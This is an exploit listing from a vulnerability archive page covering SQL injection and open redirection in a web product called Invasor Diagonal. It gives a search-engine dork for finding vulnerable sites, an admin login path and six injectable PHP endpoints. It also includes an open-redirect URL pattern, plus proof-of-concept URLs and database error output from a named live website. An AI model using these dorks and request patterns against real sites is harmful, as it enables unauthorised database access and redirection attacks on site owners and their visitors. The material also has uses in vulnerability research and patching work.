Web Development Invasor Diagonal SQL Injection and Open Redirection Vulnerability

2018.10.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : Web Development Invasor Diagonal SQL Injection and Open Redirection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 30/09/2018 # Vendor Homepage : invasordiagonal.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] + CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ] ################################################################################################# # Google Dork : intext:''web development // invasor diagonal'' # Admin Control Panel Login Path => /site_DOMAINNAMEADDRESSHERE_UAT/admin/ /admin/ # SQL Injection Exploits : /eventos.php?id=[SQL Injection] /tenistas.php?id=[SQL Injection] /profesionales_header.php?id=[SQL Injection] /novedades.php?id=[SQL Injection] /eventosCorporativos.php?id=[SQL Injection] /marcas.php?id=[SQL Injection] # Open Redirection Exploit => TARGET/site_DOMAINNAMEADDRESSHERE_UAT/set_language.php?idioma=2&gourl=https://www.REDIRECTIONADDRESSHERE.gov ################################################################################################# # Example Vulnerable Site => exxiasports.com/eventos.php?id=2%27 => [ Proof of Concept ] => archive.is/b9eAH # Example Admin Panel Path => exxiasports.com/site_exxia_UAT/admin/ => [ Proof of Concept ] => archive.is/fO8Pi # Example Open Redirection Vuln Proof of Concept => exxiasports.com/site_exxia_UAT/set_language.php?idioma=2&gourl=https://cxsecurity.com => archive.is/7Ay4h # SQL Database Error => SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Destacado = 1 LIMIT 1' at line 1] SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Extension = 'jpg' AND Destacado = 0 ORDER BY OrdenIma' at line 1] SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Objeto = 'Eventos' ORDER BY Orden' at line 1] SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Objeto = 'Eventos' AND Extension != 'jpg' ORDER BY OrdenImagen' at line 1] Warning: Invalid argument supplied for foreach() in /nfs/c05/h01/mnt/72313/domains/exxiasports.com/html/novedades.php on line 43 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-invasor-diagonal-sql-inj-and-open-redirection-vuln.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top